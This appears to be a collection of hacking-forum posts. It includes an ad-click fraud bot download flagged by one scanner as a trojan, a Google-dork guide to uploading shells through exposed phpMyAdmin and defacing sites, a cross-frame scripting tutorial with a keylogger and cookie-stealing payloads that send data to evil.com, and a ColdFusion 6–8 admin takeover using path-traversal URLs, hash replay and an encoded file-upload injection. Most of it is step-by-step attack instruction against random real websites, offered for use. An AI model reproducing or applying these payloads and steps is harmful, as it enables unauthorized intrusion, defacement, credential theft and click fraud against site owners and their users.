Right, for this tutorial, you will need THIS bot. 1) Install the program. 2) Go to the text files in it, open the first one and put one of your adf.ly/adfoc.us links in it. Then do the same with the second file and put a DIFFERENT adf.ly/adfoc.us link in it. 3) Now, open the program TWICE. 4) Add the first text file to the first program, then add the second text file to the second program. 5) (OPTIONAL) add a list of proxies. 6) Put the settings as: Delay: 4s Timeout: 20s Next link when timed out: Ticked Repeat one link: Ticked 7) Hit start bot on BOTH, then leave the bots open/minimized. 8) Watch the cash roll in Virus scan: https://www.virustotal.com/file/85f17ffa8ba597a499cc0d91123771a1e0e1bdd1bcdef8bc6ca88305ca4495ea/analysis/ SHA256: 85f17ffa8ba597a499cc0d91123771a1e0e1bdd1bcdef8bc6ca88305ca4495ea File name: AdfBotPro 3.3.1 Final.rar Detection ratio: 2 / 43 Agnitum - 20121118 AhnLab-V3 - 20121118 AntiVir - 20121119 Antiy-AVL - 20121118 Avast - 20121119 AVG - 20121119 BitDefender - 20121119 ByteHero - 20121116 CAT-QuickHeal - 20121119 ClamAV - 20121119 Commtouch - 20121119 Comodo - 20121119 DrWeb - 20121119 Emsisoft - 20121119 eSafe - 20121115 ESET-NOD32 - 20121119 F-Prot - 20121119 F-Secure - 20121119 Fortinet - 20121119 GData - 20121119 Ikarus - 20121119 Jiangmin - 20121119 K7AntiVirus - 20121116 Kaspersky - 20121119 Kingsoft - 20121112 McAfee - 20121119 McAfee-GW-Edition - 20121119 Microsoft - 20121119 MicroWorld-eScan - 20121119 Norman - 20121119 nProtect - 20121119 Panda - 20121119 Rising - 20121119 Sophos - 20121119 SUPERAntiSpyware - 20121119 Symantec WS.Reputation.1 20121119 TheHacker - 20121118 TotalDefense - 20121118 TrendMicro - 20121119 TrendMicro-HouseCall TROJ_GEN.F47V1008 20121119 VBA32 - 20121119 VIPRE - 20121119 ViRobot - 20121119 Run in sandboxie if you don't trust. This is not my guide or program. I've heard AdFoc scams, so be careful!

Description: Original Value: $30 http://www.mediafire.com/?oofjdsadtezb3

PhpMyAdmin hacking via google hi, it's simple tutorial show's you how hack phpmyadmin, using google dork. step 1: Open google.com step 2: In search box paste this code: allinurl:index.php?db=information_schema step 3: Open random site step 4: Upload shell in phpmyadmin step 5: Deface it live demo: http://houseofblinds.com/myhob/index.php...c727c9f8f7

Definition XFS or CFS abbreviated from Cross Frame Scripting is a form of web-based attack that relies on a browser exploit. The attack is based on iFrames. Let's say we have an iFrame and another one inside of it. The parent iFrame inherits the actions from the child iFrame. XFS includes in most cases and is executed in Javascript. It is therefore related to Cross Site Scripting and is client-side attack since the code is in Javascript. It is understood false by many people that mistaken it with XSS from SQLi. I don't know where this concept came from but it is completely wrong and has nothing to do with XFS at all. How XFS works Suppose we have a simple authentication system (web-based login form). What we want to do is embed a frame in the page. Therefore, upon typing the credentials, the user actually delivers them directly to the hacker. Using an IE exploit we can sniff keystrokes that are then automatically sent to our remote server with AJAX requests. In the following script we have a simple keystroke recorder that uses an iFrame. We define the array where the keystrokes will be stored. Then capture them with keystrokes.push() and return them back to the desired location (which in our case is our server where we can actually view them). Code Source: OWASP <!-- http://evil.com/example.com-login.html --> <head> <script> // array of user keystrokes var keystrokes = []; // event listener which captures user keystrokes document.onkeypress = function() { keystrokes.push(window.event.keyCode); } // function which reports keytrokes back to evil.com every second setInterval(function() { if (keystrokes.length) { var xhr = newXHR(); xhr.open("POST", "http://evil.com/k"); xhr.send(keystrokes.join(" ")); } keystrokes = []; }, 1000); // function which creates an ajax request object function newXHR() { if (window.XMLHttpRequest) return new XMLHttpRequest(); return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } </script> </head> <!-- re-focusing to this frameset tricks browser into leaking events --> <frameset onload="this.focus()" onblur="this.focus()"> <!-- frame which embeds example.com login page --> <frame src="http://example.com/login.html"> </frameset> That's generally the basic concept behind this code and it's method of exploiting iFrames. Cross Frame Scripting resembles phishing is some way. The difference between them is that XFS acts exactly the way the page is supposed to. Whereas, with a phishing page you can get the information the same way but you arise suspicion in the target and he might decide to alter his password or other credentials. Exploiting XFS Vulnerability Now in order to exploit a cross frame scripting vulnerability we first need to make sure we can execute a Javascript vector (XSS) and plus that it must be persistent so as the crafted frame to stay on the page. Most usually website developers neglect filtering Account Panels and using the settings input fields, one could place a persistent XSS. Assuming we have managed to find a persistent XSS, we can continue with the XFS frame. We need whenever a user visits our profile to display him a page for logging in the website again under the context that his session has expired or something of that kind (that has more to do with Social Engineering in order to trick him that he has been logged off). Let's say we've got the following script to inject in the place of our XSS. <iframe style="position:absolute;top:-9999px" src="http://example.com/↵ flawed-page.html?q=<script>document.write('<img src="http://evil.com/↵ ?c=' encodeURIComponent(document.cookie) '">') && window.location="http://example.com/login.php";</script>"> </iframe> This will grab the cookie upon logging in and will redirect the user to the actual login page. No suspicion will be arisen and the user will not notice the embedded frame inside the page. All you need to do now is get the session and authenticate with it. Enter the following in the URL address, replacing the website domain. javascript:void(document.cookie="strUsername=Administrator") And we do the same thing with the password value. Note: The proof of concept and all images in this tutorial have been tested in local environment on my own website. Hope some of you find the tutorial useful. Comment, criticize, rate and thanks for reading!

Cold Fusion Hacking Tutorial Introduction "ColdFusion is the name of a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications." - Wikipedia ColdFusion is also extremely secure. Because of this, a lot of government websites use it, and so do many universities. Finding vulnerable websites takes a lot of time and patience. The only vulnerable version are 6,7, and 8. Requirements/Needed materials You will need: [*]A VPN or Tor [*]A Javascript Script that will be given later on [*]Tamper Data [*]Patience Finding Vulnerable websites Finding vulnerable websites takes a while. The most simple way to find them is using a google dork: ext:cfm. cfm is the file extension used by ColdFusion. In this tutorial, I will be using www.site.com as our website. Testing if the website is vulnerable Firstly get on a VPN or Tor. Now this part is a bit tricky because their are 2 parts. The 1st part is adding this to the end of your website: /CFIDE/administrator/. So it will be www.site.com/CFIDE/administrator/. /CFIDE/administrator/ is the location of the admin panel, which is what we're exploiting. If all goes according to plan, you should come across an admin panel that also will say the version of ColdFusion it's using. If it's under 6 or above 8, find a different website. The 2nd part is, if the version was 6-8, add (after /CFIDE/administrator/) : Version 6: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en Version 7: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en? Version 8: enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e?n If something like: #Sat Feb 02 09:38:26 CET 2008 rdspassword= password=D132F5908A92640541ED7E8F44679D6C0E644D9A encrypted=true Shows up, it means the website is vulnerable. Now copy whatever is after password= until encrypter. Exploiting the vulnerability Now, add this script as a bookmark: javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)) Then open Tamper Data. Go back to the website and paste the hashed password into the password bar, then click the javascript bookmark, then a window will pop up with another password, copy that. Go to tamper data and click start tampering. Go back to the website and click the login button. Tamper Data will alert you whether you want to tamper the data or cancel. Click the checkbox that says "Keep tampering" so that it stops tampering. Then click tamper. In the top right corner there will be a textbox that displays the hashed password. Replace that with the password that popped up in the box, and click ok. You should then, if done correctly, be in the CF panel. Extra things "There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm To do to this add this to your URL: [url=http://www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined]www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined[/url](​%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D​%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%​22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C​%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%​20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E It exploits a zero day XSS attack in probe.cfm Also if the j jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPas​s​word.value)) doesn't work you can also use a python one-liner. Here it is: python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()' To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as Cyber said, do that with Tamper Data." - INST1NCT :D I hope you enjoyed the tutorial!

Kinda old but still very popular. 1. Log in to your facebook and go to HERE 2. Hit ˝special giveaway˝, like,share and click ˝get free serial˝ You will get 1 month code. You can get 1 code pre account and can be from the same ip. Enjoy.

i know the rules :) dont worry.

Hi Guys | I am The High Roller. ! ;) I like this foum, it looks really clean and amazing! ;D I will become more active here and HQ! 8) What's up peoples? :P